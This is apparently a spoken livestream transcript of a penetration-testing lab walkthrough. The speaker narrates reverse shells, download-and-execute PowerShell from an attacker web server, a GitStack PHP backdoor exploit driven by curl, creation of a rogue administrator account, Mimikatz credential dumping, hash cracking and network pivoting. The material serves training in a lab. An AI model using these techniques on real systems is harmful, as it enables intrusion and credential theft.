IP 10.200.73.200. TAC port. It's going to be 111. Now, whenever we run it, it'll just run up here. So whenever we do a PowerShell TAC EV bypass, because he's already on there, right? So now all we need to do is just import module. Import TAC module. Module invoke PowerShell TCP.ps1. See if that works. Oh, I need to actually put the newest one up there, don't I? Damn. Ooh, can you echo out of this thing? Let's try to do like an echo on one. Oops, I messed that up. Whatever. Can we echo? This would be really, really cool if we could do this. Oh wait, and I have to do that into I wonder if I can do that. And now I wonder if I can type out that guy. That would just be cool. Okay, so it only, I don't know if I echoed it, or I don't know if I broke it, or if I echoed it in there, but that did work. Can we try to execute it? We're just going to try to execute it and see what works. I mean, it did echo into there, and I told it to, you know, not overwrite anything, but just to add on, but who knows? Who knows if it did? We'll find out here in a second if it actually did or not. Because it'll connect back over to here. Okay, so I don't think he actually, I think he just overwrote it. Okay, let's go ahead and do a upload invoke PowerShell TCP.ps1 now. Because this one over here, we did actually put it at the very end, right? And we'll go ahead and do a shell again. And we'll go ahead and do a netcat, /netcat, TAC LVMP 111. Right, we do have that as open now, 111, right? Now let's go ahead and actually make our Python server again. And we'll go into here. Am I doing this a little bit longer than it has to be? Yes, I am. And if this doesn't work, then we're just going to wget as shell.exe. Wget http. Oh, it's getting late also. So I might want to stop messing around, huh? invoke PowerShell TCP.ps1. Oops. We'll see if we get 200 down here. And we do. 200. Okay. So he did that. But we don't get, well, never mind. We didn't actually do anything with him yet now, did we? We would have done IEX.WR. What if we could do that real quick? Sorry. IEX.IWR. Use basic parsing. We're going to try that. Real quick. Sorry. He got him. So IEX.IWR did work, but he didn't actually run. He should have ran. After the IEX.IWR, he should have ran something. Which he did not. So let's go ahead and just do a bind, I guess. I already made that shell, right? What did I even make that shell of? I thought I made a shell, didn't I? Shell.exe, right? Okay. Shell.exe. Yeah, shell bind TCP. Okay, well, let's try that. Shell.exe. The only problem is that whenever I upload them into here, I have to copy that shell.exe back into freaking, oh, he's in holo, like right there. Never mind. I was about to say I have to copy him back into holo, but because the Metasploit was opened up in holo by accident. Even though other people told me, hey, you're an idiot. But that's what happens. Shell.exe. Okay, and we'll go ahead and we will try to get that guy to actually do a wget, and then we'll try to get him to run. Alright. I mean, there was some other ways we could have tried. I mean, that was learning other ways is nothing ever wrong with that. We do get 200, so we most likely got them. Okay, let's see if we're actually getting these things. So we'll do DIR. Make sure they're not just getting deleted as soon as we get in there. Also, there's like an AMSI on there too. If we should have done like an AMSI bypass, some of that. Invoke PowerShell. Yeah, I mean it's there. Cool. Do we have the shell.exe in there? No, we do not. No shell.exe in there, huh? Got a bunch of PHP ones. A little bit butthurt that my shell.exe didn't make it in there. Wonder if it got moved somewhere else. Let's try one more time with that DIR. The shell.exe is not going in there, huh? Let's see like where we're at in there actually. Let's do like a PWD. C gets that get PHP. Oh, well then, figuring out why that's not working, huh? Let's go ahead and go back into Nano. Let's go ahead and CD. Let's do this. Let's actually put that wget. Oh, you know, I didn't even do an out file for it. No shit, it didn't work, Ryan. Wget, come on. You know, I'm getting tired. 888. Yeah, I got it. Shell.exe. Back out file. Shell.exe. Yeah, I kind of want to put like C users temp or something. We're just going to leave it like that. We're just going to leave it like that. We're going to see what happens. So yeah, I kind of want to put like C users temp or something like that. You know what I'm saying? Okay, so we got it again. Let's go ahead and do another dir. Make sure it's actually in there. Since I didn't even like do that last time because I'm an idiot. Dir. Okay, there's shell.exe. Let's go ahead and try to run that guy. And also let's control Z, yes. Show options. Let's set our payload to our Windows shell bind. Set payload to Windows x64 shell bind TCP, right? set our R host to 10.200.73.150. Set our port. Set our R port. L port, excuse me, 111. Let's go ahead and run that. And let's go ahead and run this guy right here. See if that works. Might close. Why are you closing? Stop closing. Do something different than closing. Huh. Just keeps closing. That sucks, huh? I do it last time with the shell.exe. Oh no, I actually did it with a. Wait, what? Oh. Oh yeah. I actually looked up gitstack, didn't I? I actually like looked into it like a little bit, didn't I? There's another way to be able to do this. Okay. So within gitstack, there is an exploit within gitstack itself. I forgot about that. Although that was some good tries, I guess, if I did like right there, right? Okay, so I forgot what the hell I called it though. Oh, man. So within gitstack, right, there is a actual exploit. Alright. That you can run. And so we got shell to run, right? But there is an actual, you can actually like upload a PHP file and actually create an exploit for it. So let's go ahead and look up gitstack exploits. Let's go ahead and do that. That was good, probably because I still have Wreath turned on, huh? So we have remote code execution like right here. Maybe this is it. Is this it like right here? No, this is the RCE thing. I wonder why this one might actually be it. Yeah. See like right here, create backdoor in PHP. Just request web index PHP question mark P equals whatever. Repository KP and echo PHP post A. Gitstack C gitstack get PHP exploit.php, right? We saw that exploit.php whenever we went in there and did dir, right? So if I do that nano again, if I do that dir, I totally forgot about that. I should have probably read everything, huh? Then we had that exploit.php in here, right? So we do this dir. There's our exploit.php like right there. Alright, so whoops. So we actually want to use that, right? And if we actually read what this exploit actually does, it creates a PHP system post and it says A. So we're going to do a curl request to, not him, so not much. We're going to do a curl, we're actually do attack X. Yeah, attack X post request, right? To that guy. And we're going to try to go to post request and then A. A equals something, right? So we'll do HTTP whatever 10.23.273.150, right? Slash web exploit.php. Okay, so if I look like right here, right? Web, okay, and then we're going to web and then exploit.php. All right, and that's how that's working, like right there, right here. Execute command HTTP boom web exploit.php format IP data A equals the command. Okay. So web, we're going here, web exploit PHP, attack D, alright, and then what's the command going to be, because that's our data, right, for curl. So we can try an IP config. Let's see if that works for us, and sure as hell it does. Okay, so from here we can then start to do different things, right, like PWD, I guess. Where am I? Maybe not, maybe it just hates me. Who am I? NT authority system. Okay, so now we want to start to do different things. to actually bring that back to ourselves, right? So what I ended up doing was create a whole user and everything. So we can do tac D, because I am entity authority system. Net user will say Ryan, PASSW0RD1/add. Okay. Net local group administrators /add Ryan. And then we'll do a net local group. We'll do power users. And remember, remote desktop was on, right? So we can always try remote desktop in also. So we can say remote desktop users. And then there's one more. It's like remote management users or something like that. Let me go ahead and just do a net local group. I forget what it's called. Remote management users. This one, like right here. This is to do it WinRM. Just in case if like remote desktop users actually has like, it's not just an administrators group, it's an actual, you know, just a single person that can do it. So let's try Remina. So you guys know I love remote desktop. And we'll try to get into 10.200.73.150, right? See if that works. Git serve, okay, yes. Username Ryan. PS on SSW0RD1. And that's not working for us, okay? So let's try like that. I don't know which way the slash goes though. It might be the other way. For like local, you know. Alright, so we're not getting in like that. So let's go ahead and just do a evil WinRM. Okay. And we'll do Ryan. We're not going to do administrator. Ryan PS on SSW0RD1 for 10.273.150, right? Don't know if this is actually going to work. Might have to do a proxy change with it. Don't know. I don't know if 5985 is even open on this guy, actually. Now I think about it. Oh my god. Nope, nothing there, okay. I do have that shell.exe in there too though. I wonder if we can actually execute that. Looked like last time I actually did an evil WinRM though. And I got it in like that. So I'm a little bit confused with that, why it's not working this time, like right here. But we did put those shells in there, right? So let's go ahead and try to do a couple different things with those shells that we put in there. Let's do a dir first. Since you got execute command, right? I think I can just execute shell.exe. I just run this. And then I do a shell.exe. Can I do that? No, okay. It's closed, okay. Yeah. It's a good try though. Preference. I want to see something. Disable real-time monitoring set to true. So that's turned off. The real-time monitoring is turned off right now. I want to look at that. I wonder if we can do like a... Oh, there's a lizard. Lizard right behind me. Or right in front of me. I wonder if we can do this. Let's try this like right here. sessions 4 shell nc tac lvmp 101 because we know that. Oh god. Make sure. Yep. We got more stuff in here now. Still not calling back to him, huh? Wonder if somebody changed out the already enabled. Okay. Huh. And low PowerShell, TAC reverse, TAC IP, 10273 at 200, TAC port 1111. Not getting back to there now, is it? What else I'm wondering if I can do? If I could ping him. Doesn't look like that guy's actually coming back with anything, huh? Oh, okay, request timed out. Alright. So we can't ping him. Okay, just want to make sure. So, last time I don't think I actually got... No, I did. I actually got an Evil 1 RM on it. This time I am not. I don't know. I don't ask too many questions. You know. I did change the administrator hash last time though. That might have something to do with it. Let's go ahead and try Evil 1 RM again. I'm not going to use proxy changing time. Let's try with that shuttle. Going through like that. 10273.150. TAC U Ryan, TAC PP, SSW0RD1. Pretty sure that's the password I put in up here. Alright, let's do it. PSSSWORD1. Are you serious? I didn't do 0. I've literally never done that password before. No wonder why I can't freaking get into it. I wonder if I can get into Remina also. That'd be way easier. Okay, so we are in Evil 1 RM now. Maybe if I wasn't an idiot. 10200.73.150. Why did I not do W0RD1? That was dumb of me, huh? Oh my god, we can get in with Remina. There we go. Okay, let's go. Alright. I don't think I RDP'd last time, so I'm actually going to, because I think it was going too slow. So we're going to put in RDP. Alright, let's go. Okay. Cool, so, supposedly I'm an administrator or something like that, right? And I was anti-system, I'd rather be anti-system authority, but, yeah, you can't always get what you want, right? Because I was anti-system authority, but now I'm just a really powerful administrator. Let's go ahead and let's see what this guy's all about here. First off, can I run this as administrator, and now am I an actual administrator? More, run as administrator. Yes. Okay, so I am an administrator. I am going to see Windows System 32. 0 code. Hey, you know, sometimes you trick yourself. I've never done that for that password before. I always do PSSW0RD1. IWR, use basic parsing. HP. We gotta put a bunch of stuff into here now. Into this guy right here. Or no, we can actually upload through here, can't we? I don't really want to upload it though. I want to stick with it. I want to stick it on memory. So I think I'm actually make myself like a little folder in here. That's what I'm gonna do. Let's CD into temp. I'm gonna make a directory caret. We'll CD into caret. Just so I'm not in everyone else's way, you know. Let's go ahead and do that. Yes. Okay. Let's go ahead and upload invoke mimikatz. and we're going to upload power view. We're going to upload all this stuff because I want to do it all in memory. I don't like doing it actually on the hard disk. We could just upload Mimikatz right out of here, or like that, but that's not really as realistic. Upload power view.ps1. We'll also upload power view dev to see what we're running on this guy. Upload power view dev.ps1. And then I'm wondering if we should even upload power up. I mean, I don't see any reason to do it. I don't think we're going to need to. So we'll leave it like that. Then we'll come over here and we'll, I really just uploaded all those copy from /root. Come on, Ryan. Invoke mimikatz.ps1. If I can spell root correctly. Oh my god. Can I just do star.ps1 to right here? Can I just do that? Then we'll just delete star.ps1. Star.ps1 to right here. Can I do that? Damn. I was really hoping I could. What else did I do for info? Let's just do that one. That should be it, right? There. Alright, cool. So, let's now get back into this guy. Well, let's show that we uploaded all those, right? Into here. I'm just going to say upload all my PowerShell scripts. I should just have like a freaking folder that I put them all in, huh? Then I can just unzip it or whatever. Maybe I should just do something like that. RDP. We're just going to say reverse shell. Boom, boom. To Metasploit. I guess I could have did an interpreter session on it, but that's boring. We're not doing that yet. We got into RDP, so I'm just going to say RDP decided to not use Metasploit the second time around and use the, well, not Metasploit, but you know, the interpreter session. And use the web server to send .ps1 files over. Okay, we'll do that like right there. I understand what that means. Alright, and we'll go into my guy back over here. And let's go ahead and HTTP 10.200.73.200 / invoke mimikatz. That does have to be a capital I. Invoke mimikatz.ps1. We'll put that in there. Huh? Oh, 8888 most likely, huh? My fault. We're going to have to make a web server. Let's go ahead and make a web server over here. So we'll do a Python 3 tac-m http.server on port 8888. And we'll go ahead and head back over here and hit enter. Alright, so he's getting invoke mimikatz right now. So let's go ahead and do a quick invoke mimikatz. And let's see what we get. All right, and I think I can actually start answering questions again too, so that'll be exciting. So what is the next question? Oh, chisel, like right there. Could not figure out how to use chisel. Could not figure out this one like right here, but I'll do that in my office one day. Get server enumeration. Okay, what do we got here? Excluding the out of scope host and the current host 200, how many hosts were discovered on the network? I believe 2 more. Yep. All right, and ascending order was the last outside was the host IP. I believe we had 150. No, we had 100 and 150. Is that correct? Yep. Scan the host. Which one does not return the status filter for every port 150? That's what we're working on right now. Let's assume that the other host is inaccessible from our current position in the network. Which TCP ports in ascending order, comma separated below 15,000 are open on the remaining target? Well, we had 80, 3389, and 5985. Now, the only reason I know 5985 was open is because of evil WinRM. Or WinRM. It's not actually called evil WinRM, but you know WinRM. We cannot currently perform a service detection scan of the target without first setting up a proxy. Okay? So for the first time being, let's assume that services mmap is identified based on the report number are accurate. Please feel free to experiment with other types. Okay. Assuming that service guesses made by mmap are accurate, which of the following services more likely to contain exploitable vulnerability? 5985, I guess, or 3. What? I'm so confused. Or is it 3389? I'm so confused. What are you talking about? Which of the services? The Git stack, right? Is that what you're talking about? The Git one? Service name, not the port number. Yeah, it was like the Git stack then? Service name, not the port number. Anybody know what that means? What it's trying to ask me there? The service name, not the port, like meaning like webmin? But it's only 4 characters long. We already exploited. Could we say that? Like we did it. Service name, not the port number. It's not Git stack. It's not webmin. It's not Git PHP because it's only 4 characters long. So I'm kind of confused what it's actually asking, like right there. If anybody else knows, feel free to shout it out. Shout it out loud. And that video just got demonetized. So we might as well go for it. Like, shout it out. Shout it out. Shout it out loud. I don't know. I don't know what it's asking, like right there. It's kind of like a weird one to me. I wonder if I was supposed to do like an mmap with services. Let's try that. Let's try like an mmap. Or is it talking about HTTP? Okay, it's talking about HTTP. Crushed it. Now that we have an idea about other hosts on the network, we start looking at some of the tools, techniques we use to ask them. We have pivoting. We did that. What is the name of the program running the service? What service? You mean like Git? What was it? Git stack? Is that it? All right. Do these default credentials work? No. Yeah, we got that. Okay. And we, what was it? 4.3. What was that? I should probably answer the questions as I do it, but I'm not that smart. Cat 43777. So 43777. Alright, cool. We are answering these things. Code review. Alright, what are we wondering? Look at the information at the top of the script. On what date was the exploit written? Man, we are way beyond that like right now. We're trying to get NTLM hashes. Looks like January 18th of 2018. It's written in Python. In Python 3, wasn't it? Did we use C? We used to. Whoops. Whatever. We're not going to add the shebang. We're not that cool. Just for the you've been paying attention to the script, what was the name of the cookie set in the post request made on line 74? Line 73 if you didn't add a shebang. We did not. The cookie request? What do you mean? Let me see here. On line 73. You should actually be able to grep it for cookies, huh? You mean this one right here? Middleware token? That is. You talking about CSRF token? Is that what you're talking about? Cross-site request forgery token? Alright, get server exploitation. They're exploited. Alright, first up, let's do some basic enumeration to get grips with the web shell. What is the host name for this target? Git serve. What operating system is target running? Windows. What user is the server running as? NT authority / system. I don't know if it was good the whole thing. They will send 3 ICMP ping packets back. How many make it to you in the waiting listener? We should have 0. That make it back to us because of pivoting. Already did that. We are way beyond. Nope, didn't even do that. We're not about that life like right there. We just curled it. But I guess we could do that also in what was it, in first suite there. Could also intercept and did like that too. Yep, we did that. We did evil. We are evil when our end is hell in there. but we decided to say screw it, and we used this guy right here. So we already dumped hashes using Mimikatz, right? But I don't see anything coming back. Maybe an else dump. User 1. Who are you? So we do have a user 1, and we have Ryan. That's me, obviously. User 1 again. I wonder if user 1 is an actual user. We're gonna grab this stuff just in case. Alright, I did Control-Shift-C. Let's just do a Control-C. We're gonna grab the stuff just in case, and we're gonna make a little nano users or ntlm.text. We'll do that, and we'll do this for user 1. Whoopsie daisy. How do I go back? Okay, what was the first letter? How about that? It was a D. Don't be like me. Okay? There's that one. There's user 1, like right there. I don't know if that's an actual user or if that's one of the other people that came onto the box, though. Alright, let's go ahead and do a invoke Mimikatz tag command. And we'll do LSA dump LSA. Let's do something like that. Oh. It's going to take me a minute to thank you because I got to look at it on my phone. Ooh. What? What? LSA dump LSA did not bring anything back for me, huh? Oh, administrator. So we might have to actually do something about that, like right there. Thank you very much, Ruza, for the file. Thanks a lot. It means a lot. Is there a user 1 on here? Authenticate with RP sharing a local copy of Mimikatz and dump the password hash for the users. Okay, what is the administrator password hash? So we should be able to get the password hash of him, huh? But LSA dump LSA didn't do it. Invoke Mimikatz. Let's do a invoke Mimikatz. LSA dump LSA did not do it, huh? Might have to actually bring it back to ourselves for this one, like right here. Let's do some invoke Mimikatz tricks. Invoke. Why am I back on there? What the hell? There we go. Okay. Let's do some invoke Mimikatz PS1 tricks. See some different ideas. Stealing credentials. Oh yeah. We want to do a privilege debug just in case. Invoke Mimikatz dump creds. I forgot about that one. Dump creds. I also don't have my other notes up that I usually use for my Mimikatz stuff. I'm trying to remember more. Alright, dump creds. There we go. We got some stuff that looks like in here. No NTLMs yet though. I'm not seeing at least any. Also haven't seen any plain text passwords yet, which is kind of weird. Usually you see a couple of plain text passwords if the person's logged on, stuff like that. Haven't seen any of those yet. Okay, I got my own password there. Don't care about that. I made my own. There's user 1 again. There's me again. And yeah, okay, that's not helping out at all now, is it? What other tricks do we have up our sleeves here? Log on passwords. LSA dump stam. Let's go for it. I like that one. That one looks nice, like right there. Let's do that guy right there. So what we're doing is we are doing a privilege debug. Alright, invoke Mimikatz tag command privilege debug. Okay, token elevate, just in case. Sekurlsa, SEKURLSA, log on passwords, and then an LSA dump SAM, and then we're going to exit out of it. Let's try that guy. I like that. That looks good. I don't know why we're going to exit. I hope it doesn't actually. It should just exit out of invoke Mimikatz, actually. Okay, cool. Oh, I like that. That's some good stuff, like right there. We got a lot of stuff getting dropped out here. There's Ryan's hash. Okay. Still have not seen the administrator hash yet. Wonder if someone accidentally deleted it. That would be a little bit annoying. Because we should see the administrator hash by now. We should have seen something come across to where that guy, you know, where he logged in somewhere. But I'm not seeing him anywhere in here. Resol Evil? There's a new one. RESIL evil. Let's go and grab that. And we'll throw him over in here. RESIL evil. We're just going to be cracking all the other two who have done the boxes hashed, I guess. To do today. Oh, there's a lot of stuff to look through. You just got to kind of just move a little slow and just do your thing. Alright, that's about it. Thomas, user Thomas, okay. That's probably a good one to get. And he's also 1001, so he's most likely on this box. THOMAS, Thomas. Okay. There we go. Thank you very much. Let's see who else do we have here. Random value, hash LTM, NTLM. Ooh, I thought we were about to see administrator. There's the administrator, like right there. Thank you very much. Let's go. Administrator. Let's see who else we can find on this guy, right? Freaking, you guys asked for more PowerShell stuff. Here you go. I am here for you guys. Let's go. So let's see. Alright, cool. I'm going to go ahead and actually copy that command straight down. User 1 again. I'm pretty sure user 1 is probably somebody that's already that's hacked this box. I'm pretty sure that's user 1. Especially if you made it March 2nd, 2022. And it's March 2nd, 2022, like right now. Oh, sorry, June. I'm from America. June 3rd, 2022. And that's like when he made his account. So, yeah, he's definitely going to be another user. Might be able to crack his password, though. That'd be fun to go in as him. Then maybe, like, mess with him. Or maybe, like, steal his token or something. I would do that. I would. I'd 100% do that, because that just kind of sounds like fun. Let's go ahead and do this, like, right here. And just say, found a bunch of hashes. Mimikatz. Found a bunch of hashes through Mimikatz. Actually, with RDP, they actually show like, okay, I did not show that I did like the whole, so I put everything over into there, right, over in here. I should probably say like we did a invoke, or that we did a, we put Mimikatz in memory, then use the following command to dump a lot of hashes, right? And then I can go ahead and I can show what hashes I dumped in here. And then if it was a real company, they would say, we don't have a user one or Resil evil. And then we say, oh crap, you're actually hacked. There we go. Alright, cool. Let's go ahead and I'm wondering if we can actually do an IEX IWR 10.200 10.200.73.200 888 power view dev.ps1. I want to try something real quick. See, that's what happens when you don't type in use basic parsing. It's parsed because the Internet Explorer engine is not available. That's what it's saying. Okay, so we have to do a little use basic parsing right here. Bam. All right, now it's available. Okay. Now from here, let's go ahead and do a get net domain controller, not DNS transition configuration. Get net domain controller. See if we can do that. Okay. Get net user. Okay. Get net local group. All right, we got somewhere. Thank God. So get serve. You get served. I wonder if we can do like a, let's go ahead and go back into Power View. Let's try to do this again. We're just going to do Power View instead of Power View Dev. Actually, I'm not getting anything with that domain control like right now. We're just going to do Power View.ps1. Let's do an invoke all check. See if I can, or not invoke all check, invoke or check user access. Invoke check local admin access. Localhost, yeah, obviously. I want to do a check, what is it, user access? No. I'm trying to remember the command to run it. Check user access, check some crap. I was trying to remember invoke user hunter. That's another one. User hunter. We need to be able to check access. We can check access to other systems. And this guy will actually run that like right there, but I don't remember exactly what the command is to do that. Is it invoke user hunter? Might just be invoke user hunter, in all honesty. Might be local. Find local admin access. Okay. Alright, so nope, didn't find any local admin access anywhere. Okay, so we did get a bunch of hashes though, so let's start to try to crack those hashes. So let's go ahead and do a John ntlm.text. Yep, format's going to be nt, tac wordless, rocky.text. Go ahead and try that. So res evil is that, and Thomas is I love Ruby. I'll see something. What? It's called NTLM, isn't it? Okay, well, we got these. Let's go. Okay, cool. Go and grab that, and we're going to throw that into here. Control SS. Okay, we can try to log in with those two and see if they have admin access anywhere else. We can also check out the net local net user Thomas. Also check him out like real quick, see what he is. Local group membership, he's a user. Okay. Workstations allowed, he's allowed on all of them. Alright. We could technically probably make him an administrator, at least on this local machine, like right here. That's not going to do much for the domain controller though. Let's go ahead and check out the other guy. Resel Evil. Resel Evil. He's an administrator, and he's also a remote management user. So Resel Evil is a lot better of a user to actually go into, and he also has a weaker password. A little bit strange. A little bit strange, like right there. So Resel Evil actually has a lot more stuff that we can mess with. So we're going to mess with him. And now that I just said all that, I'm going to go ahead and grab those couple of hashes that are left. Cat ntlm.text. I'm going to grab these hashes like right here, like administrator, and we're going to go ahead and throw them into the Wreath thing. That's the administrator one. And we also have Thomas's, who is right here. We may actually be able to do something with pass the hash also. This guy, I don't know. But I'm about to take like a 5-minute break. So we did not need no free password hash cracker. You're out of your mind. We don't need that. We have John the Ripper and Hashcats. All right. Most likely we're also not going to be doing any type of. I'm not going to be doing Empire. I have a whole thing on Empire. Doesn't really go too deep in depth into it, but I've done a lot on Empire already. So, and we have the stuff on Empire, but we already have, what is it, Metasploit up, Shelter up, S-Shelter, and we have a proxy chain through Metasploit and everything like that. So we're just going to use Metasploit as our C2 system. I'm going to take like a 5-minute break. I will be back. And yeah, I'll be back in like a little bit. Alright, about not even 5 minutes, but give me a minute, and I'll bring my phone outside. So if you guys got any questions, anything like that, ask them up, or just tell me I'm an idiot. Whatever, doesn't bother me. Alright, I'm back. Not even 5 minutes. But I did just see the most badass thing ever. Over here in Okinawa, the bats look like they can eat a small child. Like they are freaking huge. Like they land in trees and the freaking branches like bend and stuff like that. They're huge. And not like the what is it? The Philippines, I believe it is. I think it's the Philippines where they're like the size of people. They're not that big. Like the size of like grown people, but they're still pretty big over here. And I watched one sweep down and just take a rat off the street, and I was like, oh, it's like nature, you know. Okay, so we're in this guy, right? Port or 100 told us that there's nobody there, right? But everything was filtered, correct? So I kind of want to see if everything's actually filtered. I'm gonna stick as myself like right now. I'm not seeing anything about domain. I also did get domain and stuff like that, and I haven't really seen anything about domain. So I don't know if this could be computer to computer to computer. There's not really a domain controller. They're all just kind of their own like little server things. But I'm going to run a port scan from this machine onto 100. That's kind of what I want to do now. So, and that's kind of what they're talking about like right here too. They're talking about netcat. They're talking about invoke port scan. That's not what I'm talking about. So we're going to do an invoke port scan. So we're already remote desktop into it. Let's go ahead and locate invoke port. I believe I have it. Invoke port scan.ps1. Let's go. Nope, I want the Nishing one. Thank you, because you freaking rock, Nishing. Copy that over to here. And let's go ahead and we are going to upload that onto our machine, right? Upload, or let's actually CD into my temp slash. We actually, no, we have to do 2 slashes now. Windows machine, is it? CD to temp, caret, right? And we're going to go ahead and we're going to upload invoke port scan .ps1. Let's go. Okay, so let's go ahead and get that over here. We'll do an IEX IWR. Keep it in memory. Use basic parsing. HTTP, and let's clean up afterwards. If I just keep it in memory. 10200.73.200 port 8088 slash. Let me actually just copy and paste that guy, make my life easier. Invoke port scan.ps1. Control V. There we go. And we're going to do an invoke port scan, and I actually don't know how invoke port scan actually works. I've done it a couple times, but I always forget how it actually works. So what you're going to do, just going to cat that like real quick and see what can we do with this, right? So we obviously have to say ports is one of the things we have to type in. Okay. So example, invoke port scan, start address, end address. Okay, so we can do a range if we want to. We're just going to have just one address though. So we're going to do an invoke port scan. We're not going to do a range, so just IP address, is that a parameter? Description, scan for IP address, host names, and other ports in your network. Okay. Yep. Invoke port scan is the thing to do it. Resolve host name for port scan. Okay. Ports should be scanned. Default values are that. Okay. So that's actually pretty good default values. I kind of want to change that to like make it my own. So like 5985's in there. I would like to do like 8080. Oh, 8080 is in there, okay. Maybe an 8443 then. Well, I would like 5985 in there because that's what RM. So I would like that in there. But for now, we're just going to go ahead and we're just going to. I don't think I need to start. I just think I need to do an invoke port scan. We can probably just hit enter and see what it does. See if it's like, hey, you're dumb. You have to type in this. Start address. 10.200.73.100, I believe it is. End address 10.200.73.100. Okay. Didn't really seem to like that very much. So let's try again. 10.200.73.100. And we'll do 10.200.73.254. So we at least should see something of like 150. We should see 200 come back. We should at least see those, right? I think I had a different invoke port scan also script. But, okay, so just kind of scroll down like a little bit, like right there, what was that was for. Let's also make sure this guy's still up and running, and I'm pretty sure he is. I'm in him. Make sure I don't have to extend him. Oh, you can only increase. Okay, so at some point we're going to have to extend the guy. Or we're going to have to do something here. I can only extend him for 2 hours. You have to speed run these networks. Okay, it's still 1 hour. Okay, cool. It's been up for 8 hours now. It's pretty cool. Should now click that reset, huh? Okay, so it did find something on 73, 150, and 273.200. So it is doing that, but we're not really seeing any ports that are open, huh? So let's do an invoke port scan. Can I do like TAC ports? Can we do 3389, 5985, 80, 80, and 443, and 8443, and 22, 21, 23, 111, 139, 445. Do we like TAC IPs? Or can we just give it like a 10? What was it? Start address 10.200.73.1. End address 10.200.73.254. Let's try that like right there. See if it finds anything there. We should see stuff. I mean, we really should. But we're not really seeing anything with this port scan like right here. I feel like we also should have saw stuff with the mmap though also, you know? And I'm wondering if I should do that again too, like an mmap proxy change, mmap, boom, boom, and we're going to do that for 10.200.73.100 TAC PN. So do like that. And it's saying that everything's open. I did proxy change, right? That's freaking weird. Why does it say that everything's open? That's not correctly right there. It's almost like it's going through. Or it's because this guy's going like right now. 102. See, it's finding 150 and it's finding 200. It's not really finding anything else now, is it? And 10.273.100 is definitely something. I wonder if I can like do like a session into it. I think I do like a session with. I wonder if it allows for a session with yeah, it's not finding 100, is it? I wonder if it's trying to ping beforehand, because if it doesn't allow for pings, then that's not going to work. I wonder if we can do a session, ses equals new PS session to TAC computer name 10.273.100 TAC credentials of, what was that guy's credentials again that we had? Because Ryan shouldn't be on that box, right? Ryan's not going to exist on that box. But Res Evil, he's an administrator, and his password's my password. Let's try that. Okay, at least we get the password thing to pop up, so that's good. Let's go ahead and copy that, and we'll paste that in there. Say OK. Okay, so, nope, WinRM does not work on that box. Oh, man. That's poopy, huh? Okay, so what we got here? Let's start reading like a little bit. So he's doing that cat evil WinRM op scripts and they're using situation awareness network, so we can start to do our own little situational awareness, right? We do an arp-tac-A, right? And we see that 100 like right there, right? We can do an IP config to see if this guy has more than one nick, and he does not. Okay, so we do see that 10.273.100. So we're doing our own little kind of things like right there, right? We can also bring it back to interpreter. You know what? And I'm also wondering if maybe I need to actually run an R route through this guy like right here. I wonder if I need to proxy him again. Or something like double proxy maybe? Like double pivoting? I mean, it's not the first time that's ever happened, or that I've ever had to do that. It's not the first time. I wonder if that invoke port scan works on this thing right here. And we'll do it for 10.273.100. Yeah, there's no such thing as host for this thing, huh? Yeah, there's also no such thing as top ports for this guy either. I do have a different type of port scan also. I know I have another one. I have like a port scan GitHub that I have that I've done before. PS1. Invoke port scan. That's power split. Based loosely on mmap parameter host. This is the one that they're using in this thing, I believe. So we can actually try to do this guy right here because we have a host, top ports. We have ping only, ping scan only, disable port scan. Let's go ahead. So what we can do with this, right? We can just copy this whole thing and actually just make a PS1 script and instead of trying to do like wget, everything like that, right? We just copy him, go into this box over here, right? And we're going to open up Notepad. Notepad, yep, thank you. Or you can do Notepad++. Paste them into there. File, save as. And obviously we're not doing it through IEX IWR anymore. This is just another way to be able to do it, that's all. We'll put it in desktop and we'll call it port scan .ps1. We'll save that, okay? So let's go ahead and CD into C. Whoa, not recycling, man. Why the hell would you pick that first? C users, Ryan, desktop, dir, and there's our port scan, import module, or you can do the period slash, right? Import module, port scan.ps1, or you could do period slash, port scan.ps1, either way, okay? And now we can start using it. So we can do an invoke port scan, and I kind of actually want to do this on a different PowerShell, in all honesty, because we already have an invoke port scan on there, right? So let's go ahead and run it as administrator. Now, since we ran it in memory, it's only running on that one PowerShell. So it's only running on here, that port scan that we already uploaded. So now, the one that we did in memory. So now we can go to CD, users, Ryan, desktop, period slash, port scan.ps1. Then we can do an invoke port scan, tac host, 10.200.73.100. Then we'll do tac top ports 50, is that right? Let's try that like right there. Now the reason we may have not got anything back with the other one, I don't know if we're going to get anything back with this one, it may be because it tries to ping it beforehand. So I wonder if I need to like disable the ping, like a tac pn almost, like you would with mmap. So I wonder if it's something to do with that. Because we do get stuff back here. So we get port 80 and 3389 now. Right, so we do get stuff back. So the other one may have been trying to, let's also do, can we do like tac ports 3389? Well, we already know what 3389 is. Can we do 5985 and also 139 and 445? Okay, so maybe it can't do 5985. Let's try that like right there. I just want to see if 5985 is open. So the other one may have tried to ping it. If it couldn't ping it, then it didn't even try to scan it. And that may be why we weren't getting anything back with the other one. So 5985 looks like he is filtered. Alright, so let's go ahead and let's show that we used bullshit. That like right there. Okay, we'll go ahead and we'll do this. Copy that. And I'm also going to paste, or I'm actually just going to put this exploit on here also. So I'm going to do this, right? Oh wait, that was Mimikatz. We'll go ahead and we'll do RDP. Then we'll say, what's it? Port scan. Okay, then we can come over here. We'll just grab this GitHub link right here, and we'll throw it onto there. The port scan that was used is the following. There we go, okay. So there's that, right? Now what I'm going to do is I'm going to go ahead and, so we got 80 and 3389, right? So let's go ahead and check out that port 80, I guess, first. And so we'll turn back on Wreath. And we want to check out 10, 200, 73, 100, right? So we had 80 and 3389. Let's go ahead and head back over to this guy also. We had 80 and 3389, although he's probably not going to work. So 10, 200, 73, 100 is not coming back with really looks like anything right now. So let's keep reading. Pivoting, so it does. So it says pivot again, right? So we may have to do double pivoting here, right? So we found 2 ports, yeah. RDP won't be much use of us without credentials, or at least a hash, yep, although past hash attacks are often restricted through RDP anyways, true. However, web servers worth looking into. Reed told us that he worked on his website using local environments. Okay, we have 2 immediate options for this, chisel and plink, on how to access the development web server on Reed's PC from our attacking machine. If you follow the recommended route using S-shuttle to pivot from the web server, then a chisel forward proxy is recommended here, as it will be relatively easy to connect through the S-shuttle connection without requiring a relay. Look back at chisel's task, need help with this. Oh, I'm going to need help with this, 100%. So we have to proxy to another proxy, so we do have to double pivot kind of thing. But what I'm wondering is if we can actually, let's see if we can double pivot in a different way. I want to try something real quick. So I want to bring this guy. He needs to come over to an interpreter shell. We need to get this guy over to an interpreter shell, and we're going to try to run another auto route within him, and we're going to try to create another proxy, I think. Maybe. Yeah. It's going to be really weird, though. I don't know if that auto route attack is actually going to take it. Might have to drop one auto route for another one. I don't know how it's really going to work. What is going to work, though, soon is I'm going to have to go to 